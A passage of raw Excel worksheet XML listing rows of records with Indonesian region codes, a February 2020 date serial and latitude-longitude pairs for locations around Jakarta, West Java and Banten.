        <v>547</v>
      </c>
      <c r="T1553" t="s">
        <v>33</v>
      </c>
      <c r="U1553" s="5">
        <v>10682783</v>
      </c>
      <c r="V1553" s="5" t="s">
        <v>15856</v>
      </c>
      <c r="W1553" s="5">
        <v>-612810</v>
      </c>
      <c r="X1553" t="s">
        <v>19623</v>
      </c>
      <c r="Y1553" t="str">
        <f t="shared" si="24"/>
        <v>-6.12810,106.82783</v>
      </c>
    </row>
    <row r="1554" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1554">
        <v>109079</v>
      </c>
      <c r="B1554" s="1">
        <v>43886</v>
      </c>
      <c r="C1554">
        <v>0</v>
      </c>
      <c r="D1554" t="s">
        <v>22</v>
      </c>
      <c r="E1554" t="s">
        <v>23</v>
      </c>
      <c r="F1554" t="s">
        <v>5374</v>
      </c>
      <c r="G1554" t="s">
        <v>5375</v>
      </c>
      <c r="H1554" t="s">
        <v>26</v>
      </c>
      <c r="I1554" t="s">
        <v>974</v>
      </c>
      <c r="J1554" t="s">
        <v>3343</v>
      </c>
      <c r="L1554" t="s">
        <v>5376</v>
      </c>
      <c r="M1554">
        <v>3175050001</v>
      </c>
      <c r="N1554">
        <v>3175050</v>
      </c>
      <c r="O1554">
        <v>3175</v>
      </c>
      <c r="P1554">
        <v>31</v>
      </c>
      <c r="Q1554" t="s">
        <v>1037</v>
      </c>
      <c r="R1554" t="s">
        <v>1013</v>
      </c>
      <c r="S1554" t="s">
        <v>547</v>
      </c>
      <c r="T1554" t="s">
        <v>33</v>
      </c>
      <c r="U1554" s="5">
        <v>10690642</v>
      </c>
      <c r="V1554" s="5" t="s">
        <v>15485</v>
      </c>
      <c r="W1554" s="5">
        <v>-615209</v>
      </c>
      <c r="X1554" t="s">
        <v>19624</v>
      </c>
      <c r="Y1554" t="str">
        <f t="shared" si="24"/>
        <v>-6.15209,106.90642</v>
      </c>
    </row>
    <row r="1555" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1555">
        <v>109080</v>
      </c>
      <c r="B1555" s="1">
        <v>43886</v>
      </c>
      <c r="C1555">
        <v>0</v>
      </c>
      <c r="D1555" t="s">
        <v>22</v>
      </c>
      <c r="E1555" t="s">
        <v>23</v>
      </c>
      <c r="F1555" t="s">
        <v>5377</v>
      </c>
      <c r="H1555" t="s">
        <v>26</v>
      </c>
      <c r="I1555" t="s">
        <v>1099</v>
      </c>
      <c r="J1555" t="s">
        <v>5378</v>
      </c>
      <c r="L1555" t="s">
        <v>5379</v>
      </c>
      <c r="M1555">
        <v>3175020001</v>
      </c>
      <c r="N1555">
        <v>3175020</v>
      </c>
      <c r="O1555">
        <v>3175</v>
      </c>
      <c r="P1555">
        <v>31</v>
      </c>
      <c r="Q1555" t="s">
        <v>2227</v>
      </c>
      <c r="R1555" t="s">
        <v>2228</v>
      </c>
      <c r="S1555" t="s">
        <v>547</v>
      </c>
      <c r="T1555" t="s">
        <v>33</v>
      </c>
      <c r="U1555" s="5">
        <v>10683736</v>
      </c>
      <c r="V1555" s="5" t="s">
        <v>15857</v>
      </c>
      <c r="W1555" s="5">
        <v>-613673</v>
      </c>
      <c r="X1555" t="s">
        <v>19625</v>
      </c>
      <c r="Y1555" t="str">
        <f t="shared" si="24"/>
        <v>-6.13673,106.83736</v>
      </c>
    </row>
    <row r="1556" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1556">
        <v>109081</v>
      </c>
      <c r="B1556" s="1">
        <v>43886</v>
      </c>
      <c r="C1556">
        <v>0</v>
      </c>
      <c r="D1556" t="s">
        <v>22</v>
      </c>
      <c r="E1556" t="s">
        <v>23</v>
      </c>
      <c r="F1556" t="s">
        <v>5380</v>
      </c>
      <c r="G1556" t="s">
        <v>5381</v>
      </c>
      <c r="H1556" t="s">
        <v>26</v>
      </c>
      <c r="I1556" t="s">
        <v>80</v>
      </c>
      <c r="J1556" t="s">
        <v>5206</v>
      </c>
      <c r="L1556" t="s">
        <v>5382</v>
      </c>
      <c r="M1556">
        <v>3172100002</v>
      </c>
      <c r="N1556">
        <v>3172100</v>
      </c>
      <c r="O1556">
        <v>3172</v>
      </c>
      <c r="P1556">
        <v>31</v>
      </c>
      <c r="Q1556" t="s">
        <v>3168</v>
      </c>
      <c r="R1556" t="s">
        <v>1436</v>
      </c>
      <c r="S1556" t="s">
        <v>49</v>
      </c>
      <c r="T1556" t="s">
        <v>33</v>
      </c>
      <c r="U1556" s="5">
        <v>10685637</v>
      </c>
      <c r="V1556" s="5" t="s">
        <v>15858</v>
      </c>
      <c r="W1556" s="5">
        <v>-619965</v>
      </c>
      <c r="X1556" t="s">
        <v>19626</v>
      </c>
      <c r="Y1556" t="str">
        <f t="shared" si="24"/>
        <v>-6.19965,106.85637</v>
      </c>
    </row>
    <row r="1557" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1557">
        <v>109082</v>
      </c>
      <c r="B1557" s="1">
        <v>43886</v>
      </c>
      <c r="C1557">
        <v>0</v>
      </c>
      <c r="D1557" t="s">
        <v>22</v>
      </c>
      <c r="E1557" t="s">
        <v>23</v>
      </c>
      <c r="F1557" t="s">
        <v>5383</v>
      </c>
      <c r="H1557" t="s">
        <v>26</v>
      </c>
      <c r="I1557" t="s">
        <v>2300</v>
      </c>
      <c r="J1557" t="s">
        <v>3259</v>
      </c>
      <c r="L1557" t="s">
        <v>5384</v>
      </c>
      <c r="M1557">
        <v>3172100006</v>
      </c>
      <c r="N1557">
        <v>3172100</v>
      </c>
      <c r="O1557">
        <v>3172</v>
      </c>
      <c r="P1557">
        <v>31</v>
      </c>
      <c r="Q1557" t="s">
        <v>1435</v>
      </c>
      <c r="R1557" t="s">
        <v>1436</v>
      </c>
      <c r="S1557" t="s">
        <v>49</v>
      </c>
      <c r="T1557" t="s">
        <v>33</v>
      </c>
      <c r="U1557" s="5">
        <v>10687002</v>
      </c>
      <c r="V1557" s="5" t="s">
        <v>15564</v>
      </c>
      <c r="W1557" s="5">
        <v>-619731</v>
      </c>
      <c r="X1557" t="s">
        <v>19627</v>
      </c>
      <c r="Y1557" t="str">
        <f t="shared" si="24"/>
        <v>-6.19731,106.87002</v>
      </c>
    </row>
    <row r="1558" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1558">
        <v>109083</v>
      </c>
      <c r="B1558" s="1">
        <v>43886</v>
      </c>
      <c r="C1558">
        <v>0</v>
      </c>
      <c r="D1558" t="s">
        <v>22</v>
      </c>
      <c r="E1558" t="s">
        <v>23</v>
      </c>
      <c r="F1558" t="s">
        <v>5385</v>
      </c>
      <c r="G1558" t="s">
        <v>5386</v>
      </c>
      <c r="H1558" t="s">
        <v>26</v>
      </c>
      <c r="I1558" t="s">
        <v>2962</v>
      </c>
      <c r="J1558" t="s">
        <v>3135</v>
      </c>
      <c r="L1558" t="s">
        <v>5387</v>
      </c>
      <c r="M1558">
        <v>3671042002</v>
      </c>
      <c r="N1558">
        <v>3671042</v>
      </c>
      <c r="O1558">
        <v>3671</v>
      </c>
      <c r="P1558">
        <v>36</v>
      </c>
      <c r="Q1558" t="s">
        <v>2101</v>
      </c>
      <c r="R1558" t="s">
        <v>2102</v>
      </c>
      <c r="S1558" t="s">
        <v>201</v>
      </c>
      <c r="T1558" t="s">
        <v>171</v>
      </c>
      <c r="U1558" s="5">
        <v>10659035</v>
      </c>
      <c r="V1558" s="5" t="s">
        <v>15859</v>
      </c>
      <c r="W1558" s="5">
        <v>-616833</v>
      </c>
      <c r="X1558" t="s">
        <v>19628</v>
      </c>
      <c r="Y1558" t="str">
        <f t="shared" si="24"/>
        <v>-6.16833,106.59035</v>
      </c>
    </row>
    <row r="1559" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1559">
        <v>109084</v>
      </c>
      <c r="B1559" s="1">
        <v>43886</v>
      </c>
      <c r="C1559">
        <v>0</v>
      </c>
      <c r="D1559" t="s">
        <v>22</v>
      </c>
      <c r="E1559" t="s">
        <v>23</v>
      </c>
      <c r="F1559" t="s">
        <v>5388</v>
      </c>
      <c r="G1559" t="s">
        <v>5389</v>
      </c>
      <c r="H1559" t="s">
        <v>26</v>
      </c>
      <c r="I1559" t="s">
        <v>974</v>
      </c>
      <c r="J1559" t="s">
        <v>5390</v>
      </c>
      <c r="L1559" t="s">
        <v>5391</v>
      </c>
      <c r="M1559">
        <v>3173070004</v>
      </c>
      <c r="N1559">
        <v>3173070</v>
      </c>
      <c r="O1559">
        <v>3173</v>
      </c>
      <c r="P1559">
        <v>31</v>
      </c>
      <c r="Q1559" t="s">
        <v>526</v>
      </c>
      <c r="R1559" t="s">
        <v>323</v>
      </c>
      <c r="S1559" t="s">
        <v>62</v>
      </c>
      <c r="T1559" t="s">
        <v>33</v>
      </c>
      <c r="U1559" s="5">
        <v>10682789</v>
      </c>
      <c r="V1559" s="5" t="s">
        <v>15860</v>
      </c>
      <c r="W1559" s="5">
        <v>-614942</v>
      </c>
      <c r="X1559" t="s">
        <v>19629</v>
      </c>
      <c r="Y1559" t="str">
        <f t="shared" si="24"/>
        <v>-6.14942,106.82789</v>
      </c>
    </row>
    <row r="1560" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1560">
        <v>109085</v>
      </c>
      <c r="B1560" s="1">
        <v>43886</v>
      </c>
      <c r="C1560">
        <v>0</v>
      </c>
      <c r="D1560" t="s">
        <v>22</v>
      </c>
      <c r="E1560" t="s">
        <v>23</v>
      </c>
      <c r="F1560" t="s">
        <v>5392</v>
      </c>
      <c r="G1560" t="s">
        <v>5393</v>
      </c>
      <c r="H1560" t="s">
        <v>26</v>
      </c>
      <c r="I1560" t="s">
        <v>534</v>
      </c>
      <c r="J1560" t="s">
        <v>2627</v>
      </c>
      <c r="L1560" t="s">
        <v>5394</v>
      </c>
      <c r="M1560">
        <v>3275010010</v>
      </c>
      <c r="N1560">
        <v>3275010</v>
      </c>
      <c r="O1560">
        <v>3275</v>
      </c>
      <c r="P1560">
        <v>32</v>
      </c>
      <c r="Q1560" t="s">
        <v>286</v>
      </c>
      <c r="R1560" t="s">
        <v>287</v>
      </c>
      <c r="S1560" t="s">
        <v>41</v>
      </c>
      <c r="T1560" t="s">
        <v>42</v>
      </c>
      <c r="U1560" s="5">
        <v>10694858</v>
      </c>
      <c r="V1560" s="5" t="s">
        <v>15861</v>
      </c>
      <c r="W1560" s="5">
        <v>-626031</v>
      </c>
      <c r="X1560" t="s">
        <v>19630</v>
      </c>
      <c r="Y1560" t="str">
        <f t="shared" si="24"/>
        <v>-6.26031,106.94858</v>
      </c>
    </row>
    <row r="1561" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1561">
        <v>109086</v>
      </c>
      <c r="B1561" s="1">
        <v>43886</v>
      </c>
      <c r="C1561">
        <v>0</v>
      </c>
      <c r="D1561" t="s">
        <v>22</v>
      </c>
      <c r="E1561" t="s">
        <v>23</v>
      </c>
      <c r="F1561" t="s">
        <v>5395</v>
      </c>
      <c r="G1561" t="s">
        <v>5396</v>
      </c>
      <c r="H1561" t="s">
        <v>26</v>
      </c>
      <c r="I1561" t="s">
        <v>5397</v>
      </c>
      <c r="J1561" t="s">
        <v>2627</v>
      </c>
      <c r="M1561">
        <v>3275010008</v>
      </c>
      <c r="N1561">
        <v>3275010</v>
      </c>
      <c r="O1561">
        <v>3275</v>
      </c>
      <c r="P1561">
        <v>32</v>
      </c>
      <c r="Q1561" t="s">
        <v>2236</v>
      </c>
      <c r="R1561" t="s">
        <v>287</v>
      </c>
      <c r="S1561" t="s">
        <v>41</v>
      </c>
      <c r="T1561" t="s">
        <v>42</v>
      </c>
      <c r="U1561" s="5">
        <v>10693818</v>
      </c>
      <c r="V1561" s="5" t="s">
        <v>15862</v>
      </c>
      <c r="W1561" s="5">
        <v>-628174</v>
      </c>
      <c r="X1561" t="s">
        <v>19631</v>
      </c>
      <c r="Y1561" t="str">
        <f t="shared" si="24"/>
        <v>-6.28174,106.93818</v>
      </c>
    </row>
    <row r="1562" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1562">
        <v>109087</v>
      </c>
      <c r="B1562" s="1">
        <v>43886</v>
      </c>
      <c r="C1562">
        <v>0</v>
      </c>
      <c r="D1562" t="s">
        <v>22</v>
      </c>
      <c r="E1562" t="s">
        <v>23</v>
      </c>
      <c r="F1562" t="s">
        <v>5398</v>
      </c>
      <c r="G1562" t="s">
        <v>5399</v>
      </c>
      <c r="H1562" t="s">
        <v>26</v>
      </c>
      <c r="I1562" t="s">
        <v>3481</v>
      </c>
      <c r="J1562" t="s">
        <v>2777</v>
      </c>
      <c r="M1562">
        <v>3171070002</v>
      </c>
      <c r="N1562">
        <v>3171070</v>
      </c>
      <c r="O1562">
        <v>3171</v>
      </c>
      <c r="P1562">
        <v>31</v>
      </c>
      <c r="Q1562" t="s">
        <v>2142</v>
      </c>
      <c r="R1562" t="s">
        <v>121</v>
      </c>
      <c r="S1562" t="s">
        <v>108</v>
      </c>
      <c r="T1562" t="s">
        <v>33</v>
      </c>
      <c r="U1562" s="5">
        <v>10682083</v>
      </c>
      <c r="V1562" s="5" t="s">
        <v>15863</v>
      </c>
      <c r="W1562" s="5">
        <v>-624682</v>
      </c>
      <c r="X1562" t="s">
        <v>19632</v>
      </c>
      <c r="Y1562" t="str">
        <f t="shared" si="24"/>
        <v>-6.24682,106.82083</v>
      </c>
    </row>
    <row r="1563" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1563">
        <v>109088</v>
      </c>
      <c r="B1563" s="1">
        <v>43886</v>
      </c>
      <c r="C1563">
        <v>0</v>
      </c>
      <c r="D1563" t="s">
        <v>22</v>
      </c>
      <c r="E1563" t="s">
        <v>23</v>
      </c>
      <c r="F1563" s="3" t="s">
        <v>5400</v>
      </c>
      <c r="G1563" t="s">
        <v>5401</v>
      </c>
      <c r="H1563" t="s">
        <v>26</v>
      </c>
      <c r="I1563" t="s">
        <v>3211</v>
      </c>
      <c r="J1563" t="s">
        <v>550</v>
      </c>
      <c r="L1563" t="s">
        <v>5402</v>
      </c>
      <c r="M1563">
        <v>3172040003</v>
      </c>
      <c r="N1563">
        <v>3172040</v>
      </c>
      <c r="O1563">
        <v>3172</v>
      </c>
      <c r="P1563">
        <v>31</v>
      </c>
      <c r="Q1563" t="s">
        <v>552</v>
      </c>
      <c r="R1563" t="s">
        <v>281</v>
      </c>
      <c r="S1563" t="s">
        <v>49</v>
      </c>
      <c r="T1563" t="s">
        <v>33</v>
      </c>
      <c r="U1563" s="5">
        <v>10687702</v>
      </c>
      <c r="V1563" s="5" t="s">
        <v>15864</v>
      </c>
      <c r="W1563" s="5">
        <v>-625148</v>
      </c>
      <c r="X1563" t="s">
        <v>19633</v>
      </c>
      <c r="Y1563" t="str">
        <f t="shared" si="24"/>
        <v>-6.25148,106.87702</v>
      </c>
    </row>
    <row r="1564" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1564">
        <v>109089</v>
      </c>
      <c r="B1564" s="1">
        <v>43886</v>
      </c>
      <c r="C1564">
        <v>0</v>
      </c>
      <c r="D1564" t="s">
        <v>22</v>
      </c>
      <c r="E1564" t="s">
        <v>23</v>
      </c>
      <c r="F1564" t="s">
        <v>5403</v>
      </c>
      <c r="G1564" t="s">
        <v>5404</v>
      </c>
      <c r="H1564" t="s">
        <v>26</v>
      </c>
      <c r="I1564" t="s">
        <v>1953</v>
      </c>
      <c r="J1564" t="s">
        <v>543</v>
      </c>
      <c r="L1564" t="s">
        <v>3696</v>
      </c>
      <c r="M1564">
        <v>3175010003</v>
      </c>
      <c r="N1564">
        <v>3175010</v>
      </c>
      <c r="O1564">
        <v>3175</v>
      </c>
      <c r="P1564">
        <v>31</v>
      </c>
      <c r="Q1564" t="s">
        <v>545</v>
      </c>
      <c r="R1564" t="s">
        <v>546</v>
      </c>
      <c r="S1564" t="s">
        <v>547</v>
      </c>
      <c r="T1564" t="s">
        <v>33</v>
      </c>
      <c r="U1564" s="5">
        <v>10678070</v>
      </c>
      <c r="V1564" s="5" t="s">
        <v>15865</v>
      </c>
      <c r="W1564" s="5">
        <v>-613593</v>
      </c>
      <c r="X1564" t="s">
        <v>19634</v>
      </c>
      <c r="Y1564" t="str">
        <f t="shared" si="24"/>
        <v>-6.13593,106.78070</v>
      </c>
    </row>
    <row r="1565" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1565">
        <v>109090</v>
      </c>
      <c r="B1565" s="1">
        <v>43886</v>
      </c>
      <c r="C1565">
        <v>0</v>
      </c>
      <c r="D1565" t="s">
        <v>22</v>
      </c>
      <c r="E1565" t="s">
        <v>23</v>
      </c>
      <c r="F1565" t="s">
        <v>5405</v>
      </c>
      <c r="G1565" t="s">
        <v>5406</v>
      </c>
      <c r="H1565" t="s">
        <v>26</v>
      </c>
      <c r="I1565" t="s">
        <v>2028</v>
      </c>
      <c r="J1565" t="s">
        <v>1519</v>
      </c>
      <c r="L1565" t="s">
        <v>5407</v>
      </c>
      <c r="M1565">
        <v>3175010003</v>
      </c>
      <c r="N1565">
        <v>3175010</v>
      </c>
      <c r="O1565">
        <v>3175</v>
      </c>
      <c r="P1565">
        <v>31</v>
      </c>
      <c r="Q1565" t="s">
        <v>545</v>
      </c>
      <c r="R1565" t="s">
        <v>546</v>
      </c>
      <c r="S1565" t="s">
        <v>547</v>
      </c>
      <c r="T1565" t="s">
        <v>33</v>
      </c>
      <c r="U1565" s="5">
        <v>10677795</v>
      </c>
      <c r="V1565" s="5" t="s">
        <v>15866</v>
      </c>
      <c r="W1565" s="5">
        <v>-614306</v>
      </c>
      <c r="X1565" t="s">
        <v>19635</v>
      </c>
      <c r="Y1565" t="str">
        <f t="shared" si="24"/>
        <v>-6.14306,106.77795</v>
      </c>
    </row>
    <row r="1566" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1566">
        <v>109091</v>
      </c>
      <c r="B1566" s="1">
        <v>43886</v>
      </c>
      <c r="C1566">
        <v>0</v>
      </c>
      <c r="D1566" t="s">
        <v>22</v>
      </c>
      <c r="E1566" t="s">
        <v>23</v>
      </c>
      <c r="F1566" t="s">
        <v>5408</v>
      </c>
      <c r="G1566" t="s">
        <v>5409</v>
      </c>
      <c r="H1566" t="s">
        <v>26</v>
      </c>
      <c r="I1566" t="s">
        <v>5353</v>
      </c>
      <c r="J1566" t="s">
        <v>2412</v>
      </c>
      <c r="L1566" t="s">
        <v>5410</v>
      </c>
      <c r="M1566">
        <v>3172090006</v>
      </c>
      <c r="N1566">
        <v>3172090</v>
      </c>
      <c r="O1566">
        <v>3172</v>
      </c>
      <c r="P1566">
        <v>31</v>
      </c>
      <c r="Q1566" t="s">
        <v>2283</v>
      </c>
      <c r="R1566" t="s">
        <v>890</v>
      </c>
      <c r="S1566" t="s">
        <v>49</v>
      </c>
      <c r="T1566" t="s">
        <v>33</v>
      </c>
      <c r="U1566" s="5">
        <v>10688574</v>
      </c>
      <c r="V1566" s="5" t="s">
        <v>15867</v>
      </c>
      <c r="W1566" s="5">
        <v>-617744</v>
      </c>
      <c r="X1566" t="s">
        <v>19132</v>
      </c>
      <c r="Y1566" t="str">
        <f t="shared" si="24"/>
        <v>-6.17744,106.88574</v>
      </c>
    </row>
    <row r="1567" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1567">
        <v>109092</v>
      </c>
      <c r="B1567" s="1">
        <v>43886</v>
      </c>
      <c r="C1567">
        <v>0</v>
      </c>
      <c r="D1567" t="s">
        <v>22</v>
      </c>
      <c r="E1567" t="s">
        <v>23</v>
      </c>
      <c r="F1567" t="s">
        <v>5411</v>
      </c>
      <c r="G1567" t="s">
        <v>5412</v>
      </c>
      <c r="H1567" t="s">
        <v>26</v>
      </c>
      <c r="I1567" t="s">
        <v>166</v>
      </c>
      <c r="J1567" t="s">
        <v>2603</v>
      </c>
      <c r="L1567" t="s">
        <v>5413</v>
      </c>
      <c r="M1567">
        <v>3174040001</v>
      </c>
      <c r="N1567">
        <v>3174040</v>
      </c>
      <c r="O1567">
        <v>3174</v>
      </c>
      <c r="P1567">
        <v>31</v>
      </c>
      <c r="Q1567" t="s">
        <v>730</v>
      </c>
      <c r="R1567" t="s">
        <v>377</v>
      </c>
      <c r="S1567" t="s">
        <v>32</v>
      </c>
      <c r="T1567" t="s">
        <v>33</v>
      </c>
      <c r="U1567" s="5">
        <v>10678783</v>
      </c>
      <c r="V1567" s="5" t="s">
        <v>15868</v>
      </c>
      <c r="W1567" s="5">
        <v>-617375</v>
      </c>
      <c r="X1567" t="s">
        <v>19586</v>
      </c>
      <c r="Y1567" t="str">
        <f t="shared" si="24"/>
        <v>-6.17375,106.78783</v>
      </c>
    </row>
    <row r="1568" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1568">
        <v>109093</v>
      </c>
      <c r="B1568" s="1">
        <v>43886</v>
      </c>
      <c r="C1568">
        <v>0</v>
      </c>
      <c r="D1568" t="s">
        <v>22</v>
      </c>
      <c r="E1568" t="s">
        <v>23</v>
      </c>
      <c r="F1568" t="s">
        <v>5414</v>
      </c>
      <c r="G1568" t="s">
        <v>5415</v>
      </c>
      <c r="H1568" t="s">
        <v>26</v>
      </c>
      <c r="I1568" t="s">
        <v>3116</v>
      </c>
      <c r="J1568" t="s">
        <v>2627</v>
      </c>
      <c r="L1568" t="s">
        <v>5416</v>
      </c>
      <c r="M1568">
        <v>3275061004</v>
      </c>
      <c r="N1568">
        <v>3275061</v>
      </c>
      <c r="O1568">
        <v>3275</v>
      </c>
      <c r="P1568">
        <v>32</v>
      </c>
      <c r="Q1568" t="s">
        <v>39</v>
      </c>
      <c r="R1568" t="s">
        <v>40</v>
      </c>
      <c r="S1568" t="s">
        <v>41</v>
      </c>
      <c r="T1568" t="s">
        <v>42</v>
      </c>
      <c r="U1568" s="5">
        <v>10699159</v>
      </c>
      <c r="V1568" s="5" t="s">
        <v>15869</v>
      </c>
      <c r="W1568" s="5">
        <v>-618847</v>
      </c>
      <c r="X1568" t="s">
        <v>19636</v>
      </c>
      <c r="Y1568" t="str">
        <f t="shared" si="24"/>
        <v>-6.18847,106.99159</v>
      </c>
    </row>
    <row r="1569" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1569">
        <v>109094</v>
      </c>
      <c r="B1569" s="1">
        <v>43886</v>
      </c>
      <c r="C1569">
        <v>0</v>
      </c>
      <c r="D1569" t="s">
        <v>22</v>
      </c>
      <c r="E1569" t="s">
        <v>23</v>
      </c>
      <c r="F1569" t="s">
        <v>5417</v>
      </c>
      <c r="H1569" t="s">
        <v>26</v>
      </c>
      <c r="I1569" t="s">
        <v>197</v>
      </c>
      <c r="J1569" t="s">
        <v>2627</v>
      </c>
      <c r="L1569" t="s">
        <v>5418</v>
      </c>
      <c r="M1569">
        <v>3275060002</v>
      </c>
      <c r="N1569">
        <v>3275060</v>
      </c>
      <c r="O1569">
        <v>3275</v>
      </c>
      <c r="P1569">
        <v>32</v>
      </c>
      <c r="Q1569" t="s">
        <v>113</v>
      </c>
      <c r="R1569" t="s">
        <v>114</v>
      </c>
      <c r="S1569" t="s">
        <v>41</v>
      </c>
      <c r="T1569" t="s">
        <v>42</v>
      </c>
      <c r="U1569" s="5">
        <v>10696455</v>
      </c>
      <c r="V1569" s="5" t="s">
        <v>15870</v>
      </c>
      <c r="W1569" s="5">
        <v>-622705</v>
      </c>
      <c r="X1569" t="s">
        <v>18992</v>
      </c>
      <c r="Y1569" t="str">
        <f t="shared" si="24"/>
        <v>-6.22705,106.96455</v>
      </c>
    </row>
    <row r="1570" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1570">
        <v>109095</v>
      </c>
      <c r="B1570" s="1">
        <v>43886</v>
      </c>
      <c r="C1570">
        <v>0</v>
      </c>
      <c r="D1570" t="s">
        <v>22</v>
      </c>
      <c r="E1570" t="s">
        <v>23</v>
      </c>
      <c r="F1570" t="s">
        <v>5419</v>
      </c>
      <c r="G1570" t="s">
        <v>5420</v>
      </c>
      <c r="H1570" t="s">
        <v>26</v>
      </c>
      <c r="I1570" t="s">
        <v>367</v>
      </c>
      <c r="J1570" t="s">
        <v>2627</v>
      </c>
      <c r="M1570">
        <v>3216081006</v>
      </c>
      <c r="N1570">
        <v>3216081</v>
      </c>
      <c r="O1570">
        <v>3216</v>
      </c>
      <c r="P1570">
        <v>32</v>
      </c>
      <c r="Q1570" t="s">
        <v>2511</v>
      </c>
      <c r="R1570" t="s">
        <v>2512</v>
      </c>
      <c r="S1570" t="s">
        <v>41</v>
      </c>
      <c r="T1570" t="s">
        <v>42</v>
      </c>
      <c r="U1570" s="5">
        <v>10704733</v>
      </c>
      <c r="V1570" s="5" t="s">
        <v>15871</v>
      </c>
      <c r="W1570" s="5">
        <v>-624251</v>
      </c>
      <c r="X1570" t="s">
        <v>19637</v>
      </c>
      <c r="Y1570" t="str">
        <f t="shared" si="24"/>
        <v>-6.24251,107.04733</v>
      </c>
    </row>
    <row r="1571" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1571">
        <v>109096</v>
      </c>
      <c r="B1571" s="1">
        <v>43886</v>
      </c>
      <c r="C1571">
        <v>0</v>
      </c>
      <c r="D1571" t="s">
        <v>22</v>
      </c>
      <c r="E1571" t="s">
        <v>23</v>
      </c>
      <c r="F1571" t="s">
        <v>5421</v>
      </c>
      <c r="G1571" t="s">
        <v>5422</v>
      </c>
      <c r="H1571" t="s">
        <v>26</v>
      </c>
      <c r="I1571" t="s">
        <v>137</v>
      </c>
      <c r="J1571" t="s">
        <v>5423</v>
      </c>
      <c r="L1571" t="s">
        <v>5424</v>
      </c>
      <c r="M1571">
        <v>3174030006</v>
      </c>
      <c r="N1571">
        <v>3174030</v>
      </c>
      <c r="O1571">
        <v>3174</v>
      </c>
      <c r="P1571">
        <v>31</v>
      </c>
      <c r="Q1571" t="s">
        <v>2529</v>
      </c>
      <c r="R1571" t="s">
        <v>1487</v>
      </c>
      <c r="S1571" t="s">
        <v>32</v>
      </c>
      <c r="T1571" t="s">
        <v>33</v>
      </c>
      <c r="U1571" s="5">
        <v>10680785</v>
      </c>
      <c r="V1571" s="5" t="s">
        <v>15872</v>
      </c>
      <c r="W1571" s="5">
        <v>-617778</v>
      </c>
      <c r="X1571" t="s">
        <v>19638</v>
      </c>
      <c r="Y1571" t="str">
        <f t="shared" si="24"/>
        <v>-6.17778,106.80785</v>
      </c>
    </row>
    <row r="1572" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1572">
        <v>109097</v>
      </c>
      <c r="B1572" s="1">
        <v>43886</v>
      </c>
      <c r="C1572">
        <v>0</v>
      </c>
      <c r="D1572" t="s">
        <v>22</v>
      </c>
      <c r="E1572" t="s">
        <v>23</v>
      </c>
      <c r="F1572" t="s">
        <v>5425</v>
      </c>
      <c r="G1572" t="s">
        <v>5426</v>
      </c>
      <c r="H1572" t="s">
        <v>26</v>
      </c>
      <c r="I1572" t="s">
        <v>1633</v>
      </c>
      <c r="J1572" t="s">
        <v>3135</v>
      </c>
      <c r="L1572" t="s">
        <v>5427</v>
      </c>
      <c r="M1572">
        <v>3674060008</v>
      </c>
      <c r="N1572">
        <v>3674060</v>
      </c>
      <c r="O1572">
        <v>3674</v>
      </c>
      <c r="P1572">
        <v>36</v>
      </c>
      <c r="Q1572" t="s">
        <v>168</v>
      </c>
      <c r="R1572" t="s">
        <v>169</v>
      </c>
      <c r="S1572" t="s">
        <v>170</v>
      </c>
      <c r="T1572" t="s">
        <v>171</v>
      </c>
      <c r="U1572" s="5">
        <v>10672657</v>
      </c>
      <c r="V1572" s="5" t="s">
        <v>15873</v>
      </c>
      <c r="W1572" s="5">
        <v>-625688</v>
      </c>
      <c r="X1572" t="s">
        <v>19298</v>
      </c>
      <c r="Y1572" t="str">
        <f t="shared" si="24"/>
        <v>-6.25688,106.72657</v>
      </c>
    </row>
    <row r="1573" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1573">
        <v>109098</v>
      </c>
      <c r="B1573" s="1">
        <v>43886</v>
      </c>
      <c r="C1573">
        <v>0</v>
      </c>
      <c r="D1573" t="s">
        <v>22</v>
      </c>
      <c r="E1573" t="s">
        <v>23</v>
      </c>
      <c r="F1573" t="s">
        <v>5428</v>
      </c>
      <c r="G1573" t="s">
        <v>5429</v>
      </c>
      <c r="H1573" t="s">
        <v>26</v>
      </c>
      <c r="I1573" t="s">
        <v>1953</v>
      </c>
      <c r="J1573" t="s">
        <v>5430</v>
      </c>
      <c r="L1573" t="s">
        <v>5431</v>
      </c>
      <c r="M1573">
        <v>3175020001</v>
      </c>
      <c r="N1573">
        <v>3175020</v>
      </c>
      <c r="O1573">
        <v>3175</v>
      </c>
      <c r="P1573">
        <v>31</v>
      </c>
      <c r="Q1573" t="s">
        <v>2227</v>
      </c>
      <c r="R1573" t="s">
        <v>2228</v>
      </c>
      <c r="S1573" t="s">
        <v>547</v>
      </c>
      <c r="T1573" t="s">
        <v>33</v>
      </c>
      <c r="U1573" s="5">
        <v>10683225</v>
      </c>
      <c r="V1573" s="5" t="s">
        <v>14986</v>
      </c>
      <c r="W1573" s="5">
        <v>-613585</v>
      </c>
      <c r="X1573" t="s">
        <v>19639</v>
      </c>
      <c r="Y1573" t="str">
        <f t="shared" si="24"/>
        <v>-6.13585,106.83225</v>
      </c>
    </row>
    <row r="1574" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1574">
        <v>109099</v>
      </c>
      <c r="B1574" s="1">
        <v>43886</v>
      </c>
      <c r="C1574">
        <v>0</v>
      </c>
      <c r="D1574" t="s">
        <v>22</v>
      </c>
      <c r="E1574" t="s">
        <v>23</v>
      </c>
      <c r="F1574" t="s">
        <v>5432</v>
      </c>
      <c r="G1574" t="s">
        <v>5433</v>
      </c>
      <c r="H1574" t="s">
        <v>26</v>
      </c>
      <c r="I1574" t="s">
        <v>473</v>
      </c>
